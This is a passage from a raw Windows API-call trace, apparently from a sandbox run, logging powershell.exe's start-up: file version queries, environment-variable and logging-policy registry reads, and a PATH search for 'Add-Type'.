returned 1 [0082.937] CoTaskMemAlloc (cb=0x804) returned 0x42669d8 [0082.938] GetModuleBaseNameW (in: hProcess=0x468, hModule=0xd80000, lpBaseName=0x42669d8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0082.938] CoTaskMemFree (pv=0x42669d8) [0082.938] CoTaskMemAlloc (cb=0x804) returned 0x42669d8 [0082.938] GetModuleFileNameExW (in: hProcess=0x468, hModule=0xd80000, lpFilename=0x42669d8, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0082.938] CoTaskMemFree (pv=0x42669d8) [0082.938] CloseHandle (hObject=0x468) returned 1 [0082.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, 
lpFilePart=0x0) returned 0x3a [0082.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0082.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeec0) returned 1 [0082.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x4ebf184 | out: lpFileInformation=0x4ebf184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5ea9c30, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd5ea9c30, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x7711b3a3, ftLastWriteTime.dwHighDateTime=0x1d251bc, nFileSizeHigh=0x0, nFileSizeLow=0x68400)) returned 1 [0082.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeebc) returned 1 [0082.939] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x4ebf1f8 | out: lpdwHandle=0x4ebf1f8) returned 0x74c [0082.940] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x74c, lpData=0x5570a54 | out: lpData=0x5570a54) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4ebf1cc, puLen=0x4ebf1c8 | out: lplpBuffer=0x4ebf1cc*=0x5570df4, puLen=0x4ebf1c8) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570b0c, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x4ebf14c, 
puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570b60, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570ba8, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570c1c, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570c58, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570cdc, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570d24, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570d94, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, 
puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x0, puLen=0x4ebf148) returned 0 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4ebf140, puLen=0x4ebf13c | out: lplpBuffer=0x4ebf140*=0x5570df4, puLen=0x4ebf13c) returned 1 [0082.940] VerLanguageNameW (in: wLang=0x409, szLang=0x4ebeed0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0082.941] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\", lplpBuffer=0x4ebf150, puLen=0x4ebf14c | out: lplpBuffer=0x4ebf150*=0x5570a7c, puLen=0x4ebf14c) returned 1 [0087.269] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebf258 | out: lpPerformanceCount=0x4ebf258*=1641008595207) returned 1 [0087.275] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebf194, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.346] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.400] EtwEventActivityIdControl () returned 0x0 [0087.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe99c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe99c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe988, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf204 | out: phkResult=0x4ebf204*=0x0) returned 0x2 [0087.463] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf204 | out: phkResult=0x4ebf204*=0x0) returned 0x2 [0087.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf178 | out: phkResult=0x4ebf178*=0x0) returned 0x2 [0087.467] EtwEventWriteTransfer () returned 0x0 [0087.467] EtwEventWriteTransfer () returned 0x0 [0087.469] EtwEventWriteTransfer () returned 0x0 [0087.472] EtwEventWriteTransfer () returned 0x0 [0087.473] EtwEventWriteTransfer () returned 0x0 [0087.475] EtwEventWriteTransfer () returned 0x0 [0087.475] EtwEventWriteTransfer () returned 0x0 [0087.478] EtwEventWriteTransfer () returned 0x0 [0087.479] EtwEventWriteTransfer () returned 0x0 [0087.482] EtwEventWriteTransfer () returned 0x0 [0087.483] EtwEventWriteTransfer () returned 0x0 [0087.485] EtwEventWriteTransfer () returned 0x0 [0087.486] EtwEventWriteTransfer () returned 0x0 [0087.488] EtwEventWriteTransfer () returned 0x0 [0087.489] EtwEventWriteTransfer () returned 0x0 [0087.490] EtwEventWriteTransfer () returned 0x0 [0087.492] EtwEventWriteTransfer () returned 0x0 [0087.493] EtwEventWriteTransfer () returned 0x0 [0087.495] EtwEventWriteTransfer () returned 0x0 [0087.496] EtwEventWriteTransfer () returned 0x0 [0087.498] EtwEventWriteTransfer () returned 0x0 [0087.499] EtwEventWriteTransfer () returned 0x0 [0087.501] EtwEventWriteTransfer () returned 0x0 [0087.502] EtwEventWriteTransfer () returned 0x0 [0087.504] EtwEventWriteTransfer () returned 0x0 [0087.505] EtwEventWriteTransfer () returned 0x0 [0087.507] EtwEventWriteTransfer () returned 0x0 [0087.508] EtwEventWriteTransfer () returned 0x0 [0087.509] EtwEventWriteTransfer () returned 0x0 [0087.511] EtwEventWriteTransfer () returned 0x0 [0087.512] EtwEventWriteTransfer () returned 0x0 [0087.514] EtwEventWriteTransfer () returned 0x0 [0087.515] 
EtwEventWriteTransfer () returned 0x0 [0087.517] EtwEventWriteTransfer () returned 0x0 [0087.518] EtwEventWriteTransfer () returned 0x0 [0087.520] EtwEventWriteTransfer () returned 0x0 [0087.521] EtwEventWriteTransfer () returned 0x0 [0087.522] EtwEventWriteTransfer () returned 0x0 [0087.523] EtwEventWriteTransfer () returned 0x0 [0087.525] EtwEventWriteTransfer () returned 0x0 [0087.607] EtwEventWriteTransfer () returned 0x0 [0087.608] EtwEventWriteTransfer () returned 0x0 [0087.608] EtwEventWriteTransfer () returned 0x0 [0087.609] EtwEventWriteTransfer () returned 0x0 [0087.609] EtwEventWriteTransfer () returned 0x0 [0087.610] EtwEventWriteTransfer () returned 0x0 [0087.610] EtwEventWriteTransfer () returned 0x0 [0087.611] EtwEventWriteTransfer () returned 0x0 [0087.612] EtwEventWriteTransfer () returned 0x0 [0087.613] EtwEventWriteTransfer () returned 0x0 [0087.613] EtwEventWriteTransfer () returned 0x0 [0087.614] EtwEventWriteTransfer () returned 0x0 [0087.614] EtwEventWriteTransfer () returned 0x0 [0087.615] EtwEventWriteTransfer () returned 0x0 [0087.616] EtwEventWriteTransfer () returned 0x0 [0087.617] EtwEventWriteTransfer () returned 0x0 [0087.617] EtwEventWriteTransfer () returned 0x0 [0087.618] EtwEventWriteTransfer () returned 0x0 [0087.618] EtwEventWriteTransfer () returned 0x0 [0087.619] EtwEventWriteTransfer () returned 0x0 [0087.620] EtwEventWriteTransfer () returned 0x0 [0087.621] EtwEventWriteTransfer () returned 0x0 [0087.621] EtwEventWriteTransfer () returned 0x0 [0087.622] EtwEventWriteTransfer () returned 0x0 [0087.622] EtwEventWriteTransfer () returned 0x0 [0087.623] EtwEventWriteTransfer () returned 0x0 [0087.624] EtwEventWriteTransfer () returned 0x0 [0087.625] EtwEventWriteTransfer () returned 0x0 [0087.625] EtwEventWriteTransfer () returned 0x0 [0087.626] EtwEventWriteTransfer () returned 0x0 [0087.627] EtwEventWriteTransfer () returned 0x0 [0087.628] EtwEventWriteTransfer () returned 0x0 [0087.628] EtwEventWriteTransfer () returned 0x0 
[0087.629] EtwEventWriteTransfer () returned 0x0 [0087.629] EtwEventWriteTransfer () returned 0x0 [0087.630] EtwEventWriteTransfer () returned 0x0 [0087.631] EtwEventWriteTransfer () returned 0x0 [0087.632] EtwEventWriteTransfer () returned 0x0 [0087.632] EtwEventWriteTransfer () returned 0x0 [0087.634] EtwEventWriteTransfer () returned 0x0 [0087.635] EtwEventWriteTransfer () returned 0x0 [0087.637] EtwEventWriteTransfer () returned 0x0 [0087.638] EtwEventWriteTransfer () returned 0x0 [0087.641] EtwEventWriteTransfer () returned 0x0 [0087.641] EtwEventWriteTransfer () returned 0x0 [0087.643] EtwEventWriteTransfer () returned 0x0 [0087.644] EtwEventWriteTransfer () returned 0x0 [0087.646] EtwEventWriteTransfer () returned 0x0 [0087.647] EtwEventWriteTransfer () returned 0x0 [0087.648] EtwEventWriteTransfer () returned 0x0 [0087.650] EtwEventWriteTransfer () returned 0x0 [0087.651] EtwEventWriteTransfer () returned 0x0 [0087.652] EtwEventWriteTransfer () returned 0x0 [0087.654] EtwEventWriteTransfer () returned 0x0 [0087.655] EtwEventWriteTransfer () returned 0x0 [0087.656] EtwEventWriteTransfer () returned 0x0 [0087.657] EtwEventWriteTransfer () returned 0x0 [0087.659] EtwEventWriteTransfer () returned 0x0 [0087.659] EtwEventWriteTransfer () returned 0x0 [0087.661] EtwEventWriteTransfer () returned 0x0 [0087.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe958, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.675] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed98, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.676] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ebecb4, nSize=0x80 | out: lpBuffer="") returned 0xbc [0087.676] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ebec3c, nSize=0xbc | out: lpBuffer="") returned 0xbb [0087.677] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ebec28, nSize=0xbc | out: lpBuffer="") returned 0x3a [0087.685] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4265bc8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ebec30, nSize=0xbc | out: lpBuffer="") returned 0x3a [0087.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0087.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0087.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.689] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24e171e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e171e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0087.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0087.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0087.691] FindFirstFileW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ebe4c0, nSize=0xbc | out: lpBuffer="") returned 0x0 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0087.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.694] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x856b8120, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x856b8120, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0087.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, 
lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0087.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0087.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.695] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0087.695] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0087.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.695] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.695] 
GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0087.696] FindFirstFileW (in: lpFileName="C:\\Windows\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0087.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb20) returned 1 [0087.696] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x4ebede4 | out: lpFileInformation=0x4ebede4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc22608a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x24aab240, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24aab240, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0087.696] SetThreadErrorMode 
(dwNewMode=0x0, lpOldMode=0x4ebeb1c) returned 1 [0087.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeddc) returned 1 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0087.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0087.697] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Add-Type.*", lpFindFileData=0x4ebeb8c | out: lpFindFileData=0x4ebeb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0087.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb34) returned 1 [0087.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebed94) returned 1 [0087.700] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4ebec94, nSize=0xbc | out: lpBuffer="") returned 0x95 [0087.712] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\5alr3u30d3\\documents\\windowspowershell\\modules")) returned 0xffffffff [0087.721] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0087.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0087.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0087.724] GetFullPathNameW (in: lpFileName="C:\\Program 
Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0087.724] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d3c0 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, 
